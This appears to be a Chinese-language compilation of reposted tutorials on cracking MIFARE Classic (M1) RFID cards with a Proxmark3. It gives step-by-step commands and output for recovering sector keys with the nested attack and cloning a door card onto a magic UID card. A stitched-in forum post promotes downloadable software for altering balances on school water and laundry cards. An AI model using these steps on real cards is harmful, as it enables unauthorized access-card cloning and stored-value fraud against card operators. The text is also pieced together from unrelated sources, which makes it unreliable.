PM3环境搭建
windows的环境搭建比较麻烦，有虚拟机的话可以用虚拟机，强烈安利WSL(Windows subsystem for Linux)，非常友好。

接下来介绍基于Ubuntu的环境搭建，参考PM3Wiki

首先检查更新
sudo apt-get update && sudo apt-get upgrade

然后安装所依赖的工具
sudo apt install p7zip git build-essential libreadline5 libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config wget libncurses5-dev gcc-arm-none-eabi libstdc++-arm-none-eabi-newlib libpcsclite-dev pcscd

拉源码
git clone https://github.com/proxmark/proxmark3.git

当然可以使用第三方的固件，如Iceman
git clone https://github.com/RfidResearchGroup/proxmark3.git

然后获取最新的内容，进行权限配置
cd proxmark3
git pull
sudo cp -rf driver/77-mm-usb-device-blacklist.rules /etc/udev/rules.d/77-mm-usb-device-blacklist.rules
sudo udevadm control --reload-rules
sudo adduser $USER dialout

编译源文件
make clean && make all

然后就可以插入PM3了，由于我用的是WSL，Ubuntu与主机共用串口，所以需要先确定端口号，为COM7，就可以直接连接了，
 sudo ./proxmark3 /dev/ttyS7

M1卡破解
首先进行卡片类型识别，先查看没有卡的时候天线信号
proxmark3> hw tune

Measuring antenna characteristics, please wait.........
# LF antenna: 24.61 V @   125.00 kHz
# LF antenna: 29.84 V @   134.00 kHz
# LF optimal: 31.21 V @   130.43 kHz
# HF antenna: 24.53 V @    13.56 MHz
Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.

将卡放在高频区，再进行天线信号检测

Measuring antenna characteristics, please wait.........
# LF antenna: 25.16 V @   125.00 kHz
# LF antenna: 30.94 V @   134.00 kHz
# LF optimal: 32.31 V @   130.43 kHz
# HF antenna: 19.60 V @    13.56 MHz
Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.

发现HF电压发生明显变化，则该卡为高频卡，同样也可用该方法识别低频卡，使用进一步的命令，识别该卡为M1卡
proxmark3> hf search

 UID : 60 64 7d 26
ATQA : 00 04
 SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
No chinese magic backdoor command detected
Prng detection: WEAK

Valid ISO14443A Tag Found - Quiting Search

查看扇区是否采用默认密码，
proxmark3> hf mf chk *1 ? t
--chk keys. sectors:16, block no:  0, key type:?, eml:y, dmp=n checktimeout=471 us
No key specified, trying default keys
chk default key[ 0] ffffffffffff
chk default key[ 1] 000000000000
chk default key[ 2] a0a1a2a3a4a5
chk default key[ 3] b0b1b2b3b4b5
chk default key[ 4] aabbccddeeff
chk default key[ 5] 1a2b3c4d5e6f
chk default key[ 6] 123456789abc
chk default key[ 7] 010203040506
chk default key[ 8] 123456abcdef
chk default key[ 9] abcdef123456
chk default key[10] 4d3a99c351dd
chk default key[11] 1a982c7e459a
chk default key[12] d3f7d3f7d3f7
chk default key[13] 714c5c886e97
chk default key[14] 587ee5f9350f
chk default key[15] a0478cc39091
chk default key[16] 533cb6c723f6
chk default key[17] 8fd0a4f256e9

To cancel this operation press the button on the proxmark...
--o
|---|----------------|----------------|
|sec|key A           |key B           |
|---|----------------|----------------|
|000|  ffffffffffff  |  ffffffffffff  |
|001|        ?       |        ?       |
|002|  ffffffffffff  |  ffffffffffff  |
|003|        ?       |        ?       |
|004|  ffffffffffff  |  ffffffffffff  |
|005|  ffffffffffff  |  ffffffffffff  |
|006|  ffffffffffff  |  ffffffffffff  |
|007|  ffffffffffff  |  ffffffffffff  |
|008|  ffffffffffff  |  ffffffffffff  |
|009|  ffffffffffff  |  ffffffffffff  |
|010|  ffffffffffff  |  ffffffffffff  |
|011|  ffffffffffff  |  ffffffffffff  |
|012|  ffffffffffff  |  ffffffffffff  |
|013|  ffffffffffff  |  ffffffffffff  |
|014|  ffffffffffff  |  ffffffffffff  |
|015|  ffffffffffff  |  ffffffffffff  |
|---|----------------|----------------|
28 keys(s) found have been transferred to the emulator memory

具体的命令使用说明，可以自行help

发现部分扇区采用默认密码。ffffffffffff

M1卡存在漏洞，可以通过已知扇区的key破解加密扇区的key
proxmark3> hf mf nested 1 0 A FFFFFFFFFFFF d
--nested. sectors:16, block no:  0, key type:A, eml:n, dmp=y checktimeout=471 us
Testing known keys. Sector count=16
nested...
-----------------------------------------------
uid:60647d26 trgbl=4 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=4 trgkey=1
Setting authentication timeout to 103us
Found valid key:01206f340100
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=4 trgkey=0
Setting authentication timeout to 103us
Found valid key:112233445566
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
Found valid key:50f6a442e26d
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
Found valid key:e59925b18b43


-----------------------------------------------
Nested statistic:
Iterations count: 17
Time in nested: 8.851 (0.521 sec per key)
|---|----------------|---|----------------|---|
|sec|key A           |res|key B           |res|
|---|----------------|---|----------------|---|
|000|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|001|  112233445566  | 1 |  01206f340100  | 1 |
|002|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|003|  50f6a442e26d  | 1 |  e59925b18b43  | 1 |
|004|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|005|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|006|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|007|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|008|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|009|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|010|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|011|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|012|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|013|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|014|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|015|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|---|----------------|---|----------------|---|
Printing keys to binary file dumpkeys.bin...

已成功破解其他加密扇区的key，并且写到了dumpkeys.bin文件中，需要将该文件转化成PM3认识的格式才可进行门卡的复制
proxmark3> script run dumptoemul.lua
--- Executing: ./scripts/dumptoemul.lua, args''
Wrote an emulator-dump to the file 2CF0550B.eml
 
-----Finished
proxmark3>

然后将白卡放在高频区，把数据写到白卡里
proxmark3> hf mf cload 60647D26
Chinese magic backdoor commands (GEN 1a) detected
Loading magic mifare 1K
Loaded from file: 60647D26.eml

大功告成！！！

参考链接：

https://github.com/Proxmark/proxmark3/wiki/Ubuntu-Linux

https://www.cnblogs.com/k1two2/p/5706516.html

https://lzy-wi.github.io/2018/07/26/proxmark3/

			

				【原创软件】M1卡充值软件，水卡破解复制修改必备!【吾爱首发】  By:Sunshines
			
	
	

		
声明：这个软件发出来是出于学习和研究的目的，请勿用于违法行为！
前几天看了论坛上的xx卡破解教程，自己也买了个PN532来玩玩（昨天刚下单ACR122U-A9，正在路上，玩的好的话可以试试PM3），然后把两个学校的两张卡给破解了。
破解之后呢自然会想去做一些羞羞的事情，比如change一下money什么的，无奈光改金额不行，还得算出校验位是怎么来的，然后每次想把money改成多少多少，都要拿系统自带程序员计算器在那里按来按去，很是麻烦，对于我这种懒人来说，必定要偷偷懒的（同时也方便了要改很多卡的人，你懂的）
校验位无非是加减、异或、取反运算，于是我写了个程序，自带这些计算功能，就不用又打开计算器，又打开GetHex等异或运算的软件，全部整合到一个软件上了，一条龙服务！
不仅仅是整合了计算，还有更多功能，不太好描述，但是懂的人一看就懂，下面上图：
=====================快捷充值功能=========================

<ignore_js_op> 

<ignore_js_op> 

<ignore_js_op> 

=================计算功能==========================

<ignore_js_op> 


这个软件我目前还在开发中，正在开发的功能有“算法编辑”和“记账”，到时候可实现自己添加自己破解出来后的校验位算法（现在软件只是内置了两种我遇到的校验位算法），然后可以制作你给卡充值、办卡的流水账，方便以后对账、查账。
如果大家在使用中出现什么问题或者有什么软件哪里需要改进或者想要添加哪些功能，有什么想法都可以和我提，在本帖留言、站内私信或者加我扣扣，来进行反馈（加我的时候，务必说明你的目的和你是来自吾爱破解论坛，否则拒加）
在这里顺便希望能结识一起研究校验位算法的志同道合之友！最近，我在破解一张某地的洗衣卡，不知道他的校验数据是如何进行计算的，我贴上了分析数据（见下图），希望大佬们能指点指点我，谢谢！
<ignore_js_op> 
 
链接: http://pan.baidu.com/s/1dEUbdcd 密码: rdxq












	
	
	

		posted on 2017-05-08 21:56 Ctoo 阅读(...) 评论(...)  编辑 收藏
	


转载于:https://www.cnblogs.com/cneseu/p/6828073.html

proxmark内部有个卡模拟内存，emulator memory，过程大概是这样

1，把各个扇区的密码装载进 emulator memory

2，把卡扇区数据读进去 emulator memory

3，把 emulator memory 内容写入到新的 M1卡或者 CUID卡

0，清除 emulator memory 内容

proxmark3> hf mf eclr

1，装载密码

使用之前介绍的 nested 或者 hardnested 或者 sniff等不同破解方法，可以建立

一个词典文件 keys.dic，内容就是各个扇区的密码

FFFFFFFFFFFF,

FFFFFFFFFFFF,

FFFFFFFFFFFF,

FFFFFFFFFFFF,

FFFFFFFFFFFF,

FFFFFFFFFFFF,

FFFFFFFFFFFF,

FFFFFFFFFFFF,

FFFFFFFFFFFF,

FFFFFFFFFFFF,

FFFFFFFFFFFF,

29c9c9bef314,

FFFFFFFFFFFF,

FFFFFFFFFFFF,

FFFFFFFFFFFF,

FFFFFFFFFFFF,

运行命令

proxmark3> hf mf chk * ? t keys.dic

参数 * 表示所有扇区，默认1k卡，？表示测试AB密码，t 表示把key传输到 emulator memory，

keys.dic表示之前建立的字典文件

注意，卡片必须先放上去，并且确认这个 chk 命令成功，所有密码都测试通过。

查看 emulator memory key 的数据，确认密码显示正确

proxmark3> hf mf ekeyprn



2，读取卡的数据（普通M1卡的情况）

proxmark3> hf mf dump

就可以把整张卡的数据读取到 emulator memory，并且写到 dumpdata.bin 文件。

dumpdata.bin 文件比较简单，用十六进制编辑器打开就行了，就是各个扇区的数据，

密码也包含了。用 ultraedit 打开就行。

3，把数据写入到新的卡（普通M1卡的情况）

proxmark3> hf mf restore

4，把数据写到新的 CUID 卡

由于 CUID卡由特殊的命令处理

清空 CUID卡，1标示1k卡，w表示清除数据，只支持1a的卡，f表示填入默认数据

proxmark3> hf mf cwipe 1 w f

放入新的CUID卡， e表示数据来源于 emulator memory，也就是之前的dump命令读到的数据

proxmark3> hf mf cload e

如果要复制的数据是 CUID卡，那么用命令就可以读到 emulator memory了

proxmark3> hf mf csave e

 

卡片克隆复制常用UID卡，它是一种IC卡，此卡可以修改任意扇区，作为M1复制的子卡，主要应用在IC卡复制上。

1、该卡片完全兼容mifare 1k卡片。

2、卡片的block0（UID所在的block）可以任意修改，重复修改。

3、block0直接用普通mifare读写器修改，不需要特殊设备。

4、卡片的默认密码为12个F，即FFFFFFFFFFFF。

 

M1卡秘钥A 秘钥B默认0xFF或者0x00，控制位默认为“FF 07 80 69”。

所以M1卡的识别不只是读出id，还要根据秘钥A 秘钥B 控制位进行判断。注册卡片时，进行加密，就需更改秘钥A 秘钥B甚至控制位。

当然就算M1卡加密，还是有办法破解，了解下淘宝上几百就能买到的proxmark3，能轻松破解M1加密卡中的秘钥A 秘钥B，从而读出卡片内容，复制到另一张UID卡。

相关参数如下：

存储容量：　8Kbit，16个分区,每分区两组密码

工作频率：　13.56MHZ

通讯速度：　106Kboud

读写距离：　2.5—10CM

读写时间：　1-2MS

工作温度：　-20℃-85℃

擦写次数：　＞100000次

数据保存：　＞10年

封装材料：　PVC